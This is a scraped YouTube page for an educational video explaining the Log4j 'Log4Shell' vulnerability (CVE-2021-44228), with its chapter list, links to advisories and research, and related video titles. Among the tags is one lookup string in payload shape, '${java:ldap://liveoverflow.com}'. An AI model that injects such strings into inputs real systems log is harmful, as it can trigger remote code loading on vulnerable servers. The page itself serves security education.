Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228

Channel:
United States LiveOverflow
Subscribers:
920,000
Published on ● Video Link: https://www.youtube.com/watch?v=w2F67LbEtnk


Category:
Vlog
Duration: 17:44
262,922 views
12,488

Let's try to make sense of the Log4j vulnerability called Log4Shell. First we look at the Log4j features and JNDI, and then we explore the history of the recent log4shell vulnerability. This is part 1 of a two part series into log4j.

Log4j Issues:
2013: https://issues.apache.org/jira/browse/LOG4J2-313
2014: https://issues.apache.org/jira/browse/LOG4J2-905
2017: https://issues.apache.org/jira/browse/LOG4J2-2109

Log4j 2 Security: https://logging.apache.org/log4j/2.x/security.html

German Government Warning: https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&v=3

Cloudflare: https://blog.cloudflare.com/exploitation-of-cve-2021-44228-before-public-disclosure-and-evolution-of-waf-evasion-patterns/

A JOURNEY FROM JNDI/LDAP
MANIPULATION TO REMOTE CODE
EXECUTION DREAM LAND: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
whitepaper: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf

---

00:00 - Intro
01:05 - BugBounty Public Service Announcement
02:23 - Chapter #1: Log4j 2
03:38 - Log4j Lookups
04:15 - Chapter #2: JNDI
06:01 - JNDI vs. Log4j
06:35 - Chapter #3: Log4Shell Timeline
07:33 - Developer Experiences Unexpected Lookups
09:51 - The Discovery of Log4Shell in 2021
11:08 - Chapter #4: The 2016 JNDI Security Research
11:56 - Java Serialized Object Features
13:27 - Why Was The Security Research Ignored?
14:44 - Chapter #5: Security Research vs. Software Engineering
16:49 - Final Words and Outlook to Part 2
17:23 - Outro

-=[ ❤️ Support ]=-

→ per Video: https://www.patreon.com/join/liveoverflow
→ per Month: https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w/join

-=[ 🐕 Social ]=-

→ Twitter: https://twitter.com/LiveOverflow/
→ Instagram: https://instagram.com/LiveOverflow/
→ Blog: https://liveoverflow.com/
→ Subreddit: https://www.reddit.com/r/LiveOverflow/
→ Facebook: https://www.facebook.com/LiveOverflow/



Other Videos By LiveOverflow


2022-03-24I've been Hacking for 10 Years! (Stripe CTF Speedrun)
2022-03-16Missing HTTP Security Headers - Bug Bounty Tips
2022-03-07Finding 0day in Apache APISIX During CTF (CVE-2022-24112)
2022-02-24Exploiting Java Tomcat With a Crazy JSP Web Shell - Real World CTF 2022
2022-02-12Sudo Exploit for (old) Ubuntu 20.04 LTS
2022-02-01Fuzzing Java to Find Log4j Vulnerability - CVE-2021-45046
2022-01-18Debugging The Failing sudoedit Exploit | Ep.16
2022-01-11Creating The First (Failed) Sudoedit Exploit | Ep. 15
2022-01-03Learning about nss (Linux Name Service Switch) During Sudo Exploitation | Ep. 14
2021-12-24Log4j Lookups in Depth // Log4Shell CVE-2021-44228 - Part 2
2021-12-17Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228
2021-12-14Can We Find a New Exploit Strategy? | Ep. 13
2021-12-02Authorization vs. Authentication (Google Bug Bounty)
2021-11-18Developing GDB Extension for Heap Exploitation | Ep. 12
2021-11-04How Hackers Get Into Every Device!
2021-10-26Design Flaw in Security Product - ALLES! CTF 2021
2021-10-17Fuzzing Heap Layout to Overflow Function Pointers | Ep. 11
2021-10-06Video Essay about the Security Creator Scene
2021-09-26Did you really find a vulnerability in Google? - ft. @PwnFunction
2021-09-19Developing a Tool to Find Function Pointers on The Heap | Ep. 10
2021-09-12What Ethereum Smart Contract Hacking Looks Like


Tags:
${java:ldap://liveoverflow.com}
CVE
Live Overflow
blog
cve-2021-44228
enterprise java
exploit
exploit tutorial
exploit walkthrough
hacking tutorial
how to hack
in-depth
java
java deserialization
java logging
javaee
jndi
jvm
ladps
ldap
ldap server
liveoverflow
log4j
log4j rce
log4j2
log4shell
log4shell demo
logger
maven
minecraft
objctstream
object serialization
remote class loading
rmi
serialisation
update
upgrade
vulnerability
walkthrough
writeup
zero day